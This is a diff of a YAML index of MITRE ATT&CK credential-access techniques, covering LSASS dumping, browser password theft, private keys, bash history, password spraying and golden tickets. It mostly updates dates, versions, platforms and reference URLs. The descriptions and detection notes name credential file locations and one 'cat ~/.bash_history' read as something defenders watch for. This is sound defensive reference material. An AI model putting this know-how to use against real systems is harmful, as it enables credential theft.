       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -44948,55 +45719,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -45026,6 +45752,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -45035,23 +45767,58 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -45088,23 +45855,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -45137,21 +45904,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -45162,7 +45928,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45196,7 +45962,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -45224,7 +45990,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -45235,14 +46001,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -45350,12 +46115,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45392,6 +46156,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45404,7 +46169,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -45454,12 +46219,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests: []
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45485,6 +46249,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -45500,18 +46265,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -45538,14 +46303,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -45556,13 +46318,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -45576,6 +46338,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -45586,12 +46349,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -45666,7 +46429,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests: []
   T1558.001:
@@ -45712,7 +46474,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -45747,16 +46509,14 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests: []
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -45766,21 +46526,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -45829,33 +46591,11 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests: []
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -45870,25 +46610,43 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests: []
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -45962,7 +46720,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests: []
   T1606.001:
@@ -46024,11 +46781,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -46077,6 +46833,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -46085,6 +46842,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -46095,13 +46853,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -46157,44 +46916,11 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests: []
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46211,25 +46937,54 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
